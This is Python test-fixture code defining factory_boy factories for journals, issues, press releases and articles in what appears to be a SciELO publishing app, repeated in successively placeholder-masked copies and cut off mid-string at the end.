@classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = 
models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n\n\nclass GroupFactory(factory.Factory):\n <assignment token>\n <assignment token>\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass 
StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n 
study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n\n\nclass SubjectCategoryFactory(factory.Factory):\n <assignment token>\n <assignment token>\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 
'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = 
models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
